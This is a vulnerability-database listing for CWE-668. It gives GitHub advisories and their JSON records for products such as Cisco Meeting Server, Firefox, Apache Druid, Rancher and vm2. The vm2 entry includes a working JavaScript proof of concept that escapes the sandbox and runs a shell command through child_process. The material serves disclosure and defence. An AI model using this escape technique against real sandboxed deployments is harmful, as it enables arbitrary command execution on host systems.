Common Weakness Enumeration

CWE-668

Discouraged

Exposure of Resource to Wrong Sphere

Abstraction: Class · Status: Draft

The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource.

1252 vulnerabilities reference this CWE, most recent first.

GHSA-9M39-HMV3-2F6W

Vulnerability from github – Published: 2022-05-13 01:38 – Updated: 2022-05-13 01:38
VLAI
Details

A vulnerability in the Traversal Using Relay NAT (TURN) server included with Cisco Meeting Server (CMS) could allow an authenticated, remote attacker to gain unauthenticated or unauthorized access to components of or sensitive information in an affected system. The vulnerability is due to an incorrect default configuration of the TURN server, which could expose internal interfaces and ports on the external interface of an affected system. An attacker could exploit this vulnerability by using a TURN server to perform an unauthorized connection to a Call Bridge, a Web Bridge, or a database cluster in an affected system, depending on the deployment model and CMS services in use. A successful exploit could allow the attacker to gain unauthenticated access to a Call Bridge or database cluster in an affected system or gain unauthorized access to sensitive meeting information in an affected system. To exploit this vulnerability, the attacker must have valid credentials for the TURN server of the affected system. This vulnerability affects Cisco Meeting Server (CMS) deployments that are running a CMS Software release prior to Release 2.0.16, 2.1.11, or 2.2.6. Cisco Bug IDs: CSCvf51127.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-12249"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-09-13T22:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "A vulnerability in the Traversal Using Relay NAT (TURN) server included with Cisco Meeting Server (CMS) could allow an authenticated, remote attacker to gain unauthenticated or unauthorized access to components of or sensitive information in an affected system. The vulnerability is due to an incorrect default configuration of the TURN server, which could expose internal interfaces and ports on the external interface of an affected system. An attacker could exploit this vulnerability by using a TURN server to perform an unauthorized connection to a Call Bridge, a Web Bridge, or a database cluster in an affected system, depending on the deployment model and CMS services in use. A successful exploit could allow the attacker to gain unauthenticated access to a Call Bridge or database cluster in an affected system or gain unauthorized access to sensitive meeting information in an affected system. To exploit this vulnerability, the attacker must have valid credentials for the TURN server of the affected system. This vulnerability affects Cisco Meeting Server (CMS) deployments that are running a CMS Software release prior to Release 2.0.16, 2.1.11, or 2.2.6. Cisco Bug IDs: CSCvf51127.",
  "id": "GHSA-9m39-hmv3-2f6w",
  "modified": "2022-05-13T01:38:01Z",
  "published": "2022-05-13T01:38:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12249"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170913-cmsturn"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/100821"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1039357"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9M9W-3428-H4CQ

Vulnerability from github – Published: 2022-05-24 17:45 – Updated: 2022-07-13 00:01
VLAI
Details

If an attacker is able to alter specific about:config values (for example malware running on the user's computer), the Devtools remote debugging feature could have been enabled in a way that was unnoticable to the user. This would have allowed a remote attacker (able to make a direct network connection to the victim) to monitor the user's browsing activity and (plaintext) network traffic. This was addressed by providing a visual cue when Devtools has an open network socket. This vulnerability affects Firefox < 87.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-23985"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-03-31T14:15:00Z",
    "severity": "MODERATE"
  },
  "details": "If an attacker is able to alter specific about:config values (for example malware running on the user\u0027s computer), the Devtools remote debugging feature could have been enabled in a way that was unnoticable to the user. This would have allowed a remote attacker (able to make a direct network connection to the victim) to monitor the user\u0027s browsing activity and (plaintext) network traffic. This was addressed by providing a visual cue when Devtools has an open network socket. This vulnerability affects Firefox \u003c 87.",
  "id": "GHSA-9m9w-3428-h4cq",
  "modified": "2022-07-13T00:01:10Z",
  "published": "2022-05-24T17:45:59Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23985"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1659129"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202104-10"
    },
    {
      "type": "WEB",
      "url": "https://www.mozilla.org/security/advisories/mfsa2021-10"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9MRV-M6P6-5V76

Vulnerability from github – Published: 2022-07-01 00:01 – Updated: 2022-07-12 00:00
VLAI
Details

In a openshift node, there is a cron job to update mcollective facts that mishandles a temporary file. This may lead to loss of confidentiality and integrity.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2013-4561"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-06-30T19:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "In a openshift node, there is a cron job to update mcollective facts that mishandles a temporary file. This may lead to loss of confidentiality and integrity.",
  "id": "GHSA-9mrv-m6p6-5v76",
  "modified": "2022-07-12T00:00:54Z",
  "published": "2022-07-01T00:01:05Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-4561"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openshift/origin-server/commit/f1abe972794e35a4bfba597694ce829990f14d39"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1029652"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9P5G-VG43-MJ5R

Vulnerability from github – Published: 2021-09-27 20:13 – Updated: 2023-09-26 13:13
VLAI
Summary
Druid ingestion system Authenticated users can read data from other sources than intended
Details

In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.druid:druid-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.22.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-36749"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-09-27T19:20:40Z",
    "nvd_published_at": "2021-09-24T10:15:00Z",
    "severity": "MODERATE"
  },
  "details": "In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.",
  "id": "GHSA-9p5g-vg43-mj5r",
  "modified": "2023-09-26T13:13:17Z",
  "published": "2021-09-27T20:13:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36749"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-793h-6f7r-6qvm"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r304dfe56a5dfe1b2d9166b24d2c74ad1c6730338b20aef77a00ed2be@%3Cannounce.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rc9400a70d0ec5cdb8a3486fc5ddb0b5282961c0b63e764abfbcb9f5d%40%3Cdev.druid.apache.org%3E"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Druid ingestion system Authenticated users can read data from other sources than intended "
}

GHSA-9P98-FMFQ-XHXP

Vulnerability from github – Published: 2023-03-01 09:30 – Updated: 2023-03-10 21:30
VLAI
Details

An authenticated information disclosure vulnerability exists in the ArubaOS web-based management interface. Successful exploitation of this vulnerability results in the ability to read arbitrary files in the underlying operating system.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-22777"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-03-01T08:15:00Z",
    "severity": "MODERATE"
  },
  "details": "An authenticated information disclosure vulnerability exists in the ArubaOS web-based management interface. Successful exploitation of this vulnerability results in the ability to read arbitrary files in the underlying operating system.",
  "id": "GHSA-9p98-fmfq-xhxp",
  "modified": "2023-03-10T21:30:25Z",
  "published": "2023-03-01T09:30:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-22777"
    },
    {
      "type": "WEB",
      "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-002.txt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9PPM-VMXX-M22X

Vulnerability from github – Published: 2022-05-24 19:05 – Updated: 2022-05-24 19:05
VLAI
Details

Information Disclosure in NoneCMS v1.3 allows remote attackers to obtain sensitive information via the component "/public/index.php".

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-18646"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-06-22T15:15:00Z",
    "severity": "HIGH"
  },
  "details": "Information Disclosure in NoneCMS v1.3 allows remote attackers to obtain sensitive information via the component \"/public/index.php\".",
  "id": "GHSA-9ppm-vmxx-m22x",
  "modified": "2022-05-24T19:05:52Z",
  "published": "2022-05-24T19:05:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-18646"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PearlyNautilus/Security-Code-Review/issues/5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-9QJ6-QJGG-37QQ

Vulnerability from github – Published: 2026-05-08 15:58 – Updated: 2026-05-14 20:37
VLAI
Summary
vm2 has sandbox breakout via `neutralizeArraySpeciesBatch`
Details

Summary

VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.

Details

The new method neutralizeArraySpeciesBatch works with objects from the other side but can call into this side via getter on the array prototype exposing objects of the wrong side into the sandbox. This can be used to get host objects and get the host Function object.

PoC

const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
const a = [];
Object.defineProperty(Array.prototype, 0, {
    set(value) {
        a.f = Buffer.prototype.inspect;
        value.arr.f.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
    }
});
new Buffer(a);
`));

Impact

Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.11.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "vm2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.11.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44008"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-08T15:58:48Z",
    "nvd_published_at": "2026-05-13T18:16:17Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nVM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.\n\n### Details\n\nThe new method `neutralizeArraySpeciesBatch` works with objects from the other side but can call into this side via getter on the array prototype exposing objects of the wrong side into the sandbox. This can be used to get host objects and get the host `Function` object.\n\n### PoC\n\n```js\nconst {VM} = require(\"vm2\");\nconst vm = new VM();\nconsole.log(vm.run(`\nconst a = [];\nObject.defineProperty(Array.prototype, 0, {\n\tset(value) {\n\t\ta.f = Buffer.prototype.inspect;\n\t\tvalue.arr.f.constructor.constructor(\"return process\")().mainModule.require(\u0027child_process\u0027).execSync(\u0027touch pwned\u0027);\n\t}\n});\nnew Buffer(a);\n`));\n```\n\n### Impact\n\nAttackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.",
  "id": "GHSA-9qj6-qjgg-37qq",
  "modified": "2026-05-14T20:37:08Z",
  "published": "2026-05-08T15:58:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-9qj6-qjgg-37qq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44008"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patriksimek/vm2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vm2 has sandbox breakout via `neutralizeArraySpeciesBatch`"
}

GHSA-9QQ2-XHMC-H9QR

Vulnerability from github – Published: 2021-06-23 17:57 – Updated: 2022-04-25 20:20
VLAI
Summary
Access Control Bypass
Details

An issue was discovered in Rancher 2 through 2.1.5. Any project member with access to the default namespace can mount the netes-default service account in a pod, and then use that pod to execute administrative privileged commands against the k8s cluster. This could be mitigated by isolating the default namespace in a separate project, where only cluster admins can be given permissions to access. As of 2018-12-20, this bug affected ALL clusters created or imported by Rancher.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/rancher/rancher"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.1.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2018-20321"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288",
      "CWE-668"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-05-12T18:10:58Z",
    "nvd_published_at": "2019-04-10T14:29:00Z",
    "severity": "MODERATE"
  },
  "details": "An issue was discovered in Rancher 2 through 2.1.5. Any project member with access to the default namespace can mount the netes-default service account in a pod, and then use that pod to execute administrative privileged commands against the k8s cluster. This could be mitigated by isolating the default namespace in a separate project, where only cluster admins can be given permissions to access. As of 2018-12-20, this bug affected ALL clusters created or imported by Rancher.",
  "id": "GHSA-9qq2-xhmc-h9qr",
  "modified": "2022-04-25T20:20:41Z",
  "published": "2021-06-23T17:57:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-20321"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rancher/rancher/commit/6ea187fcc2309d5a7a14ed47de5688bf6573f448"
    },
    {
      "type": "WEB",
      "url": "https://forums.rancher.com/c/announcements"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/rancher/rancher"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rancher/rancher/releases/tag/v2.1.6"
    },
    {
      "type": "WEB",
      "url": "https://rancher.com/blog/2019/2019-01-29-explaining-security-vulnerabilities-addressed-in-rancher-v2-1-6-and-v2-0-11"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Access Control Bypass"
}

GHSA-9R73-4W68-QFRW

Vulnerability from github – Published: 2022-08-23 00:00 – Updated: 2022-08-25 00:00
VLAI
Details

Dell PowerScale OneFS, versions 9.0.0 up to and including 9.1.0.19, 9.2.1.12, 9.3.0.6, and 9.4.0.2, contain a process invoked with sensitive information vulnerability. A CLI user may potentially exploit this vulnerability, leading to information disclosure.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-31238"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-08-22T17:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Dell PowerScale OneFS, versions 9.0.0 up to and including 9.1.0.19, 9.2.1.12, 9.3.0.6, and 9.4.0.2, contain a process invoked with sensitive information vulnerability. A CLI user may potentially exploit this vulnerability, leading to information disclosure.",
  "id": "GHSA-9r73-4w68-qfrw",
  "modified": "2022-08-25T00:00:28Z",
  "published": "2022-08-23T00:00:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31238"
    },
    {
      "type": "WEB",
      "url": "https://www.dell.com/support/kbdoc/en-gh/000201094/dsa-2022-149-dell-emc-powerscale-onefs-security-update"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9RMR-65MH-RJ57

Vulnerability from github – Published: 2022-05-24 17:38 – Updated: 2022-05-24 17:38
VLAI
Details

Dell Inspiron 5675 BIOS versions prior to 1.4.1 contain a UEFI BIOS RuntimeServices overwrite vulnerability. A local attacker with access to system memory may exploit this vulnerability by overwriting the RuntimeServices structure to execute arbitrary code in System Management Mode (SMM).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-26186"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-01-08T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "Dell Inspiron 5675 BIOS versions prior to 1.4.1 contain a UEFI BIOS RuntimeServices overwrite vulnerability. A local attacker with access to system memory may exploit this vulnerability by overwriting the RuntimeServices structure to execute arbitrary code in System Management Mode (SMM).",
  "id": "GHSA-9rmr-65mh-rj57",
  "modified": "2022-05-24T17:38:20Z",
  "published": "2022-05-24T17:38:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26186"
    },
    {
      "type": "WEB",
      "url": "https://www.dell.com/support/kbdoc/en-us/000180645/dsa-2020-247-dell-client-platform-security-update-for-uefi-bios-runtimeservices-overwrite-vulnerability"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

No mitigation information available for this CWE.

No CAPEC attack patterns related to this CWE.